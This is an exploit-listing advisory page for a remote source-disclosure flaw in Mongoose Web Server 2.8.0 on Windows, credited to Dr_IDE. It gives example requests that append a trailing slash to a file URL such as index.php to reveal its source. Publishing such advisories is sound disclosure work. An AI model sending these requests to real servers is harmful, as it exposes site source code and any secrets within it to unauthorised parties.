Mongoose Web Server 2.8.0 remote source disclosure

2009-10-23 / 2009-10-24

Credit: Dr_IDE

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By:	Dr_IDE
# Tested On:	Windows XPSP3
# Download: 	http://code.google.com/p/mongoose/
#
#######################################################

- Description -

Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.

Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.

- Technical Details -

http://[ webserver IP][:port]/[ file ][/]

http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/

#[pocoftheday.blogspot.com]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mongoose Web Server 2.8.0 remote source disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.